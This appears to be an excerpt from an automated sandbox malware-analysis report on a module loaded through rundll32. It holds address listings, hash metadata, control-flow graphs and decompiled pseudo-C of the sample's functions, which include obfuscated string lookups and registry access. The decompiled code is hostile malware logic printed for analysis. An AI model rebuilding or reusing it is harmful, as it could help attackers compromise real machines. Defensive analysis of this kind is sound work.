                                                                                                                                                                                                                                    0x04c38be4
                                                                                                                                                                                                                                    0x04c38bf0
                                                                                                                                                                                                                                    0x04c38bfd
                                                                                                                                                                                                                                    0x04c38c05
                                                                                                                                                                                                                                    0x04c38c0a
                                                                                                                                                                                                                                    0x04c38c15
                                                                                                                                                                                                                                    0x04c38c17
                                                                                                                                                                                                                                    0x04c38c1a
                                                                                                                                                                                                                                    0x04c38c1c
                                                                                                                                                                                                                                    0x04c38c23
                                                                                                                                                                                                                                    0x04c38c29
                                                                                                                                                                                                                                    0x04c38c2c
                                                                                                                                                                                                                                    0x04c38c2f
                                                                                                                                                                                                                                    0x04c38c34
                                                                                                                                                                                                                                    0x04c38c41
                                                                                                                                                                                                                                    0x04c38c43
                                                                                                                                                                                                                                    0x04c38c49
                                                                                                                                                                                                                                    0x04c38c53
                                                                                                                                                                                                                                    0x04c38c53
                                                                                                                                                                                                                                    0x04c38c55
                                                                                                                                                                                                                                    0x04c38c5c
                                                                                                                                                                                                                                    0x04c38c5f
                                                                                                                                                                                                                                    0x04c38c62
                                                                                                                                                                                                                                    0x04c38c67
                                                                                                                                                                                                                                    0x04c38c74
                                                                                                                                                                                                                                    0x04c38c76
                                                                                                                                                                                                                                    0x04c38c84
                                                                                                                                                                                                                                    0x04c38c84
                                                                                                                                                                                                                                    0x04c38c86
                                                                                                                                                                                                                                    0x04c38c94
                                                                                                                                                                                                                                    0x04c38c99
                                                                                                                                                                                                                                    0x04c38c9d
                                                                                                                                                                                                                                    0x04c38ca0
                                                                                                                                                                                                                                    0x04c38e63
                                                                                                                                                                                                                                    0x04c38e6d
                                                                                                                                                                                                                                    0x04c38e76
                                                                                                                                                                                                                                    0x04c38ca6
                                                                                                                                                                                                                                    0x04c38cb2
                                                                                                                                                                                                                                    0x04c38cba
                                                                                                                                                                                                                                    0x04c38cbd
                                                                                                                                                                                                                                    0x04c38e57
                                                                                                                                                                                                                                    0x04c38e61
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c38e61
                                                                                                                                                                                                                                    0x04c38cc3
                                                                                                                                                                                                                                    0x04c38cc9
                                                                                                                                                                                                                                    0x04c38cce
                                                                                                                                                                                                                                    0x04c38cd7
                                                                                                                                                                                                                                    0x04c38ce8
                                                                                                                                                                                                                                    0x04c38cec
                                                                                                                                                                                                                                    0x04c38cf5
                                                                                                                                                                                                                                    0x04c38cfb
                                                                                                                                                                                                                                    0x04c38d0a
                                                                                                                                                                                                                                    0x04c38d11
                                                                                                                                                                                                                                    0x04c38d1a
                                                                                                                                                                                                                                    0x04c38d20
                                                                                                                                                                                                                                    0x04c38e4b
                                                                                                                                                                                                                                    0x04c38e55
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c38e55
                                                                                                                                                                                                                                    0x04c38d2c
                                                                                                                                                                                                                                    0x04c38d32
                                                                                                                                                                                                                                    0x04c38d33
                                                                                                                                                                                                                                    0x04c38d3a
                                                                                                                                                                                                                                    0x04c38d3d
                                                                                                                                                                                                                                    0x04c38e41
                                                                                                                                                                                                                                    0x04c38e49
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c38e49
                                                                                                                                                                                                                                    0x04c38d46
                                                                                                                                                                                                                                    0x04c38d4d
                                                                                                                                                                                                                                    0x04c38d55
                                                                                                                                                                                                                                    0x04c38d5a
                                                                                                                                                                                                                                    0x04c38d63
                                                                                                                                                                                                                                    0x04c38d69
                                                                                                                                                                                                                                    0x04c38d70
                                                                                                                                                                                                                                    0x04c38d77
                                                                                                                                                                                                                                    0x04c38d7a
                                                                                                                                                                                                                                    0x04c38e79
                                                                                                                                                                                                                                    0x04c38e2d
                                                                                                                                                                                                                                    0x04c38e2d
                                                                                                                                                                                                                                    0x04c38e32
                                                                                                                                                                                                                                    0x04c38e3d
                                                                                                                                                                                                                                    0x04c38e3f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c38e3f
                                                                                                                                                                                                                                    0x04c38d84
                                                                                                                                                                                                                                    0x04c38d8b
                                                                                                                                                                                                                                    0x04c38d8e
                                                                                                                                                                                                                                    0x04c38d93
                                                                                                                                                                                                                                    0x04c38d9e
                                                                                                                                                                                                                                    0x04c38da3
                                                                                                                                                                                                                                    0x04c38da6
                                                                                                                                                                                                                                    0x04c38dac
                                                                                                                                                                                                                                    0x04c38db2
                                                                                                                                                                                                                                    0x04c38db8
                                                                                                                                                                                                                                    0x04c38dbb
                                                                                                                                                                                                                                    0x04c38dc1
                                                                                                                                                                                                                                    0x04c38dc4
                                                                                                                                                                                                                                    0x04c38dcd
                                                                                                                                                                                                                                    0x04c38dcd
                                                                                                                                                                                                                                    0x04c38dd9
                                                                                                                                                                                                                                    0x04c38de5
                                                                                                                                                                                                                                    0x04c38de9
                                                                                                                                                                                                                                    0x04c38deb
                                                                                                                                                                                                                                    0x04c38df0
                                                                                                                                                                                                                                    0x04c38df2
                                                                                                                                                                                                                                    0x04c38df7
                                                                                                                                                                                                                                    0x04c38df9
                                                                                                                                                                                                                                    0x04c38dfa
                                                                                                                                                                                                                                    0x04c38dfb
                                                                                                                                                                                                                                    0x04c38dfc
                                                                                                                                                                                                                                    0x04c38e09
                                                                                                                                                                                                                                    0x04c38e11
                                                                                                                                                                                                                                    0x04c38e14
                                                                                                                                                                                                                                    0x04c38e14
                                                                                                                                                                                                                                    0x04c38df0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c38ddb
                                                                                                                                                                                                                                    0x04c38ddf
                                                                                                                                                                                                                                    0x04c38e16
                                                                                                                                                                                                                                    0x04c38e19
                                                                                                                                                                                                                                    0x04c38e22
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c38e22
                                                                                                                                                                                                                                    0x04c38de1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c38de1
                                                                                                                                                                                                                                    0x04c38dd9

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 7ab115f6b12d1be0a676ffda2d84a31a7805ced252a4b39bfb77174288d21c38
                                                                                                                                                                                                                                    • Instruction ID: ba185fc3ce7b046f8885aab4a7c747515c20991a6456bb4a3e0796eab837ba10
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7ab115f6b12d1be0a676ffda2d84a31a7805ced252a4b39bfb77174288d21c38
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B913979900208AFDB11EFA8DC84BAE7BBAEF48356F144054F806E7260D739ED51DB60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C312D4, Relevance: .2, Instructions: 222COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 126 4c312d4-4c31306 128 4c3157b-4c31582 126->128 129 4c3130c-4c3132a 126->129 131 4c31330-4c31359 call 4c3a7bc call 4c395b1 129->131 132 4c3156b-4c3156f 129->132 137 4c3155b-4c3155f 131->137 138 4c3135f-4c31384 131->138 132->128 137->132 140 4c31386-4c3139d 138->140 141 4c313aa-4c3140e 138->141 140->141 146 4c31414-4c3142d 141->146 147 4c31559 141->147 149 4c31476-4c31478 146->149 147->137 150 4c3147a 149->150 151 4c3142f-4c31436 149->151 152 4c3147e-4c31484 150->152 155 4c3143f-4c31441 151->155 153 4c31486-4c3148c 152->153 154 4c31494 152->154 156 4c31492 153->156 157 4c31530-4c31538 153->157 158 4c31496-4c3149c 154->158 159 4c3149e-4c314be 154->159 160 4c31443-4c31466 155->160 161 4c31469-4c31473 155->161 156->154 163 4c31543-4c31547 157->163 158->159 162 4c314eb-4c314f2 158->162 171 4c314c0-4c314c5 159->171 172 4c314c9-4c314cc 159->172 160->161 161->149 170 4c314fb-4c314fd 162->170 164 4c3153a-4c3153c 163->164 165 4c31549-4c3154c 163->165 168 4c31542 164->168 169 4c3153e-4c31540 164->169 175 4c31555-4c31557 165->175 168->163 169->168 173 4c31513-4c31526 170->173 174 4c314ff-4c31510 170->174 171->172 176 4c314c7 171->176 177 4c314d1-4c314e8 call 4c35544 172->177 178 4c314ce-4c314d0 172->178 173->162 184 4c31528-4c3152b 173->184 174->173 175->132 176->172 177->162 178->177 184->152
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: a1ed7b2f27d42fc66abf805b3d32d8e1b3911db34e81b7bd641a30a88d9ef35f
                                                                                                                                                                                                                                    • Instruction ID: 8bc5be279adfe0f928f2cb0fe5d72ab4901e5e428f30d82630db07478df0ce62
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a1ed7b2f27d42fc66abf805b3d32d8e1b3911db34e81b7bd641a30a88d9ef35f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB814AB6D00119AFDF11DFA5DC84AEEBBBAFB48302F144166E506E6250DB35AE44CF60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C3225B, Relevance: .2, Instructions: 159COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 186 4c3225b-4c32276 call 4c3550e 189 4c32278-4c32286 186->189 190 4c3228c-4c3229a 186->190 189->190 192 4c322ac-4c322c7 call 4c33d0d 190->192 193 4c3229c-4c3229f 190->193 199 4c322d1 192->199 200 4c322c9-4c322cf 192->200 193->192 194 4c322a1-4c322a6 193->194 194->192 196 4c3242d 194->196 198 4c3242f-4c32435 196->198 201 4c322d7-4c322ec call 4c31bf4 call 4c31b2f 199->201 200->201 206 4c322f7-4c322fc 201->206 207 4c322ee 201->207 208 4c32322-4c3233a call 4c32049 206->208 209 4c322fe-4c32303 206->209 207->206 218 4c32366-4c32368 208->218 219 4c3233c-4c32364 call 4c3a7bc 208->219 210 4c32419-4c3241d 209->210 211 4c32309 209->211 215 4c32425-4c3242b 210->215 216 4c3241f-4c32423 210->216 213 4c3230c-4c3231b call 4c3a501 211->213 225 4c3231d 213->225 215->198 216->198 216->215 220 4c32369-4c3236d 218->220 219->220 220->210 224 4c32373-4c32389 220->224 229 4c3238b-4c323b7 224->229 230 4c323b9-4c323bb 224->230 225->210 231 4c323bc-4c323c0 229->231 230->231 231->210 233 4c323c2-4c323e2 call 4c3269c call 4c34094 231->233 233->210 238 4c323e4-4c323eb call 4c396a4 233->238 241 4c323f2-4c323f9 238->241 242 4c323ed-4c323f0 238->242 243 4c323fb-4c323fd 241->243 244 4c3240e-4c32412 call 4c36786 241->244 242->210 243->210 245 4c323ff-4c32403 call 4c33dd9 243->245 248 4c32417 244->248 249 4c32408-4c3240c 245->249 248->210 249->210 249->244
                                                                                                                                                                                                                                    C-Code - Quality: 29%
                                                                                                                                                                                                                                    			E04C3225B(signed int __edx) {
				signed int _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				signed int _t22;
				signed int _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				signed int _t32;
				signed int _t41;
				signed int _t42;
				signed int _t43;
				signed int _t45;
				intOrPtr _t47;
				intOrPtr* _t49;
				signed int _t51;
				signed char _t53;
				intOrPtr _t55;
				signed int _t56;
				intOrPtr _t59;
				signed int _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t65;

				_t58 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E04C3550E();
				if(_t21 != 0) {
					_t56 =  *0x4c3d25c; // 0x4000000a
					_t52 = (_t56 & 0xf0000000) + _t21;
					 *0x4c3d25c = (_t56 & 0xf0000000) + _t21;
				}
				_t22 =  *0x4c3d164(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E04C33D0D( &_v8,  &_v20); // executed
					_t51 = _t25;
					_t26 =  *0x4c3d27c; // 0xa6a5a8
					if( *0x4c3d25c > 5) {
						_t8 = _t26 + 0x4c3e5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x4c3ea15; // 0x44283a44
						_t27 = _t7;
					}
					E04C31BF4(_t27, _t27);
					_t31 = E04C31B2F(_t58,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						__imp__(_v20);
					}
					_t59 = 5;
					if(_t51 != _t59) {
						 *0x4c3d270 =  *0x4c3d270 ^ 0x81bbe65d;
						_t32 = E04C32049(_t31, 0x60);
						__eflags = _t32;
						 *0x4c3d32c = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							L04C3A7BC();
							_t47 =  *0x4c3d32c; // 0x56a95b0
							_t65 = _t65 + 0xc;
							__imp__(_t47 + 0x40, _t32, 0, 0x60);
							_t49 =  *0x4c3d32c; // 0x56a95b0
							 *_t49 = 0x4c3e836;
						}
						__eflags = 0;
						_t51 = 0;
						if(0 == 0) {
							__imp__( *0x4c3d238, 0, 0x43);
							__eflags = 0;
							 *0x4c3d2c4 = 0;
							if(0 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t53 =  *0x4c3d25c; // 0x4000000a
								_t58 = _t53 & 0x000000ff;
								_t55 =  *0x4c3d27c; // 0xa6a5a8
								_t13 = _t55 + 0x4c3e55a; // 0x697a6f4d
								_t52 = _t13;
								 *0x4c3d120(0, _t13, _t53 & 0x000000ff, _t53 & 0x000000ff, 0x4c3c2a7);
							}
							__eflags = 0;
							_t51 = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E04C3269C( ~_v8 &  *0x4c3d270, 0x4c3d00c); // executed
								_t41 = E04C34094(_t52); // executed
								_t51 = _t41;
								__eflags = _t51;
								if(_t51 != 0) {
									goto L30;
								}
								_t42 = E04C396A4(_t52); // executed
								__eflags = _t42;
								if(_t42 != 0) {
									__eflags = _v8;
									_t62 = _v12;
									if(_v8 != 0) {
										L29:
										_t43 = E04C36786(_t58, _t62, _v8); // executed
										_t51 = _t43;
										goto L30;
									}
									__eflags = _t62;
									if(__eflags == 0) {
										goto L30;
									}
									_t45 = E04C33DD9(__eflags, _t62 + 4); // executed
									_t51 = _t45;
									__eflags = _t51;
									if(_t51 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t51 = 8;
							}
						}
					} else {
						_t63 = _v12;
						if(_t63 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x4c3d160();
							}
							goto L34;
						}
						_t64 = _t63 + 4;
						do {
						} while (E04C3A501(_t59, _t64, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t51 = _t22;
					L34:
					return _t51;
				}
			}































                                                                                                                                                                                                                                    0x04c3225b
                                                                                                                                                                                                                                    0x04c32266
                                                                                                                                                                                                                                    0x04c32269
                                                                                                                                                                                                                                    0x04c3226c
                                                                                                                                                                                                                                    0x04c3226f
                                                                                                                                                                                                                                    0x04c32276
                                                                                                                                                                                                                                    0x04c32278
                                                                                                                                                                                                                                    0x04c32284
                                                                                                                                                                                                                                    0x04c32286
                                                                                                                                                                                                                                    0x04c32286
                                                                                                                                                                                                                                    0x04c3228f
                                                                                                                                                                                                                                    0x04c32297
                                                                                                                                                                                                                                    0x04c3229a
                                                                                                                                                                                                                                    0x04c322b4
                                                                                                                                                                                                                                    0x04c322c0
                                                                                                                                                                                                                                    0x04c322c2
                                                                                                                                                                                                                                    0x04c322c7
                                                                                                                                                                                                                                    0x04c322d1
                                                                                                                                                                                                                                    0x04c322d1
                                                                                                                                                                                                                                    0x04c322c9
                                                                                                                                                                                                                                    0x04c322c9
                                                                                                                                                                                                                                    0x04c322c9
                                                                                                                                                                                                                                    0x04c322c9
                                                                                                                                                                                                                                    0x04c322d8
                                                                                                                                                                                                                                    0x04c322e5
                                                                                                                                                                                                                                    0x04c322ec
                                                                                                                                                                                                                                    0x04c322f1
                                                                                                                                                                                                                                    0x04c322f1
                                                                                                                                                                                                                                    0x04c322f9
                                                                                                                                                                                                                                    0x04c322fc
                                                                                                                                                                                                                                    0x04c32322
                                                                                                                                                                                                                                    0x04c3232e
                                                                                                                                                                                                                                    0x04c32333
                                                                                                                                                                                                                                    0x04c32335
                                                                                                                                                                                                                                    0x04c3233a
                                                                                                                                                                                                                                    0x04c32366
                                                                                                                                                                                                                                    0x04c32368
                                                                                                                                                                                                                                    0x04c3233c
                                                                                                                                                                                                                                    0x04c32340
                                                                                                                                                                                                                                    0x04c32345
                                                                                                                                                                                                                                    0x04c3234a
                                                                                                                                                                                                                                    0x04c32351
                                                                                                                                                                                                                                    0x04c32357
                                                                                                                                                                                                                                    0x04c3235c
                                                                                                                                                                                                                                    0x04c32362
                                                                                                                                                                                                                                    0x04c32369
                                                                                                                                                                                                                                    0x04c3236b
                                                                                                                                                                                                                                    0x04c3236d
                                                                                                                                                                                                                                    0x04c3237c
                                                                                                                                                                                                                                    0x04c32382
                                                                                                                                                                                                                                    0x04c32384
                                                                                                                                                                                                                                    0x04c32389
                                                                                                                                                                                                                                    0x04c323b9
                                                                                                                                                                                                                                    0x04c323bb
                                                                                                                                                                                                                                    0x04c3238b
                                                                                                                                                                                                                                    0x04c3238b
                                                                                                                                                                                                                                    0x04c32391
                                                                                                                                                                                                                                    0x04c3239e
                                                                                                                                                                                                                                    0x04c323a4
                                                                                                                                                                                                                                    0x04c323a4
                                                                                                                                                                                                                                    0x04c323ac
                                                                                                                                                                                                                                    0x04c323b5
                                                                                                                                                                                                                                    0x04c323bc
                                                                                                                                                                                                                                    0x04c323be
                                                                                                                                                                                                                                    0x04c323c0
                                                                                                                                                                                                                                    0x04c323c7
                                                                                                                                                                                                                                    0x04c323d4
                                                                                                                                                                                                                                    0x04c323d9
                                                                                                                                                                                                                                    0x04c323de
                                                                                                                                                                                                                                    0x04c323e0
                                                                                                                                                                                                                                    0x04c323e2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c323e4
                                                                                                                                                                                                                                    0x04c323e9
                                                                                                                                                                                                                                    0x04c323eb
                                                                                                                                                                                                                                    0x04c323f2
                                                                                                                                                                                                                                    0x04c323f6
                                                                                                                                                                                                                                    0x04c323f9
                                                                                                                                                                                                                                    0x04c3240e
                                                                                                                                                                                                                                    0x04c32412
                                                                                                                                                                                                                                    0x04c32417
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c32417
                                                                                                                                                                                                                                    0x04c323fb
                                                                                                                                                                                                                                    0x04c323fd
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c32403
                                                                                                                                                                                                                                    0x04c32408
                                                                                                                                                                                                                                    0x04c3240a
                                                                                                                                                                                                                                    0x04c3240c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c3240c
                                                                                                                                                                                                                                    0x04c323ef
                                                                                                                                                                                                                                    0x04c323ef
                                                                                                                                                                                                                                    0x04c323c0
                                                                                                                                                                                                                                    0x04c322fe
                                                                                                                                                                                                                                    0x04c322fe
                                                                                                                                                                                                                                    0x04c32303
                                                                                                                                                                                                                                    0x04c32419
                                                                                                                                                                                                                                    0x04c3241d
                                                                                                                                                                                                                                    0x04c32425
                                                                                                                                                                                                                                    0x04c32425
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c3241d
                                                                                                                                                                                                                                    0x04c32309
                                                                                                                                                                                                                                    0x04c3230c
                                                                                                                                                                                                                                    0x04c32316
                                                                                                                                                                                                                                    0x04c3231d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c3242d
                                                                                                                                                                                                                                    0x04c3242d
                                                                                                                                                                                                                                    0x04c32431
                                                                                                                                                                                                                                    0x04c32435
                                                                                                                                                                                                                                    0x04c32435

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: c52ed88fe02b27c5285e3b6832d42983ed8de01b7b43e581d57219da155a9cc2
                                                                                                                                                                                                                                    • Instruction ID: 51b7eb43e38bd7d4b1f4b45f7d532cd920cd12434c147e91e51e759e63f9c329
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c52ed88fe02b27c5285e3b6832d42983ed8de01b7b43e581d57219da155a9cc2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7851F3B5A00214ABEF20DBA5DC84B6E77BAEB04717F0444A6E503E7140E779FE04AB91
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C33DD9, Relevance: .2, Instructions: 155COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 250 4c33dd9-4c33e1b call 4c3a7bc call 4c36a12 255 4c33e21-4c33e2c 250->255 256 4c33f69-4c33f6b 250->256 259 4c33e33-4c33e35 255->259 257 4c33f6c-4c33f72 256->257 260 4c33e3b-4c33e47 call 4c3a72d 259->260 261 4c33f5c-4c33f5e 259->261 267 4c33e49 260->267 268 4c33e4c-4c33e5e call 4c3809f 260->268 262 4c33f5f-4c33f67 call 4c39039 261->262 262->257 267->268 271 4c33e64-4c33e80 call 4c3809f 268->271 272 4c33f4b-4c33f4d 268->272 277 4c33e82-4c33e9f call 4c36bfa call 4c39039 271->277 278 4c33ea1-4c33ea3 271->278 273 4c33f4e-4c33f53 272->273 273->262 275 4c33f55-4c33f5a call 4c31f99 273->275 275->262 282 4c33ea4-4c33ea6 277->282 278->282 284 4c33f41-4c33f49 call 4c39039 282->284 285 4c33eac-4c33eb3 282->285 284->273 287 4c33eb5-4c33ecc call 4c3809f 285->287 288 4c33ef4-4c33f1f call 4c38f83 call 4c31c74 285->288 297 4c33ece-4c33eeb call 4c36bfa call 4c39039 287->297 298 4c33eed-4c33eef 287->298 302 4c33f21-4c33f37 call 4c342ea 288->302 303 4c33f39-4c33f3c call 4c39039 288->303 299 4c33ef0-4c33ef2 297->299 298->299 299->284 299->288 302->303 303->284
                                                                                                                                                                                                                                    C-Code - Quality: 72%
                                                                                                                                                                                                                                    			E04C33DD9(void* __eflags, char _a4) {
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				void* _v36;
				char _v40;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				void* __ebx;
				void* __esi;
				intOrPtr _t39;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t48;
				void* _t51;
				intOrPtr _t60;
				void* _t70;
				intOrPtr _t75;

				_push(0x2c);
				_push(0);
				_push( &_v84);
				_v88 = 0;
				L04C3A7BC();
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t39 =  *0x4c3d27c; // 0xa6a5a8
				_t5 = _t39 + 0x4c3ee40; // 0x410025
				_t41 = E04C36A12(_t5);
				_t75 = _t41;
				_v16 = _t75;
				if(_t75 == 0) {
					_t70 = 8;
					L24:
					return _t70;
				}
				__imp__(_t75);
				_t43 =  *0x4c3d114(_t75, _a4, _t41); // executed
				if(_t43 != 0) {
					_t70 = 1;
					L22:
					E04C39039(_t43, _v16);
					goto L24;
				}
				if(E04C3A72D(0,  &_a4) != 0) {
					_a4 = 0;
				}
				_t43 = E04C3809F(0,  *0x4c3d33c);
				_v12 = _t43;
				if(_t43 == 0) {
					_t70 = 8;
					goto L19;
				} else {
					_t48 =  *0x4c3d27c; // 0xa6a5a8
					_t11 = _t48 + 0x4c3e81a; // 0x65696c43
					_t51 = E04C3809F(0, _t11);
					_t77 = _t51;
					if(_t51 == 0) {
						_t70 = 8;
					} else {
						_t70 = E04C36BFA(_a4, 0x80000001, _v12, _t77,  &_v88,  &_v84);
						_t51 = E04C39039(_t68, _t77);
					}
					if(_t70 != 0) {
						L17:
						_t43 = E04C39039(_t51, _v12);
						L19:
						_t76 = _a4;
						if(_a4 != 0) {
							_t43 = E04C31F99(_t76);
						}
						goto L22;
					} else {
						if(( *0x4c3d260 & 0x00000001) == 0) {
							L14:
							E04C38F83(_t70, _v88, _v84,  *0x4c3d270, 0);
							_t70 = E04C31C74(_v88,  &_v80,  &_v76, 0);
							if(_t70 == 0) {
								_v24 = _a4;
								_v20 =  &_v88;
								_t70 = E04C342EA( &_v40, 0);
							}
							_t51 = E04C39039(_t56, _v88);
							goto L17;
						}
						_t60 =  *0x4c3d27c; // 0xa6a5a8
						_t18 = _t60 + 0x4c3e823; // 0x65696c43
						_t51 = E04C3809F(0, _t18);
						_t79 = _t51;
						if(_t51 == 0) {
							_t70 = 8;
						} else {
							_t70 = E04C36BFA(_a4, 0x80000001, _v12, _t79,  &_v72,  &_v68);
							_t51 = E04C39039(_t65, _t79);
						}
						if(_t70 != 0) {
							goto L17;
						} else {
							goto L14;
						}
					}
				}
			}

























                                                                                                                                                                                                                                    0x04c33de4
                                                                                                                                                                                                                                    0x04c33de9
                                                                                                                                                                                                                                    0x04c33dea
                                                                                                                                                                                                                                    0x04c33deb
                                                                                                                                                                                                                                    0x04c33dee
                                                                                                                                                                                                                                    0x04c33df5
                                                                                                                                                                                                                                    0x04c33dfb
                                                                                                                                                                                                                                    0x04c33dfc
                                                                                                                                                                                                                                    0x04c33dfd
                                                                                                                                                                                                                                    0x04c33dfe
                                                                                                                                                                                                                                    0x04c33dff
                                                                                                                                                                                                                                    0x04c33e00
                                                                                                                                                                                                                                    0x04c33e08
                                                                                                                                                                                                                                    0x04c33e0f
                                                                                                                                                                                                                                    0x04c33e14
                                                                                                                                                                                                                                    0x04c33e18
                                                                                                                                                                                                                                    0x04c33e1b
                                                                                                                                                                                                                                    0x04c33f6b
                                                                                                                                                                                                                                    0x04c33f6e
                                                                                                                                                                                                                                    0x04c33f72
                                                                                                                                                                                                                                    0x04c33f72
                                                                                                                                                                                                                                    0x04c33e22
                                                                                                                                                                                                                                    0x04c33e2d
                                                                                                                                                                                                                                    0x04c33e35
                                                                                                                                                                                                                                    0x04c33f5e
                                                                                                                                                                                                                                    0x04c33f5f
                                                                                                                                                                                                                                    0x04c33f62
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c33f62
                                                                                                                                                                                                                                    0x04c33e47
                                                                                                                                                                                                                                    0x04c33e49
